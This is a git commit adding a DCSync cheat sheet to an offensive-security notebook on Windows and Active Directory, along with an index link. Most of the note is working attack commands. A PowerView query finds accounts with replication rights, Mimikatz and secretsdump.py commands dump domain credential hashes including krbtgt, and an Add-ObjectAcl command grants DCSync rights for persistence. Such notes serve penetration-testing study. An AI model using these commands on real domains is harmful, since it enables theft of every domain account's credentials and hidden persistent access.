Added DCSync

Author: kristofhracza

Windows Hardening/Active Directory/DCSync.md

@@ -0,0 +1,34 @@
+# Overview
+The DCSync attack simulates the behaviour of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
+
+## Prerequisites
+- Having the following permission:  **Replicate Directory Changes**, **Replicate Directory Changes All**
+
+# Enumeration
+Check permission with [*PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
+```powershell
+Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
+```
+
+# Exploit
+## Local
+```powershell
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
+```
+
+## Remote
+```bash
+secretsdump.py -just-dc <USER>:<PASSWORD>@<IP> -outputfile <OUTPUT.txt>
+```
+
+
+# Persistence
+If you are a *domain admin*, you can grant DCSync rights to anyone using [*PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
+```powershell
+Add-ObjectAcl -TargetDistinguishedName "dc=company,dc=corp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
+```
+
+# References
+- [https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/dcsync.html)
+- [https://www.semperis.com/blog/dcsync-attack/](https://www.semperis.com/blog/dcsync-attack/)
+- [*PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)

Windows Hardening/Windows Hardening.md

@@ -40,6 +40,7 @@
 - Active Directory
 	- [[Enumeration Tools]]
 	- [[LAPS]]
+	- [[DCSync]]
 - Lateral Movement
 	- [[DCOM]]
 - [[AV Evasion]]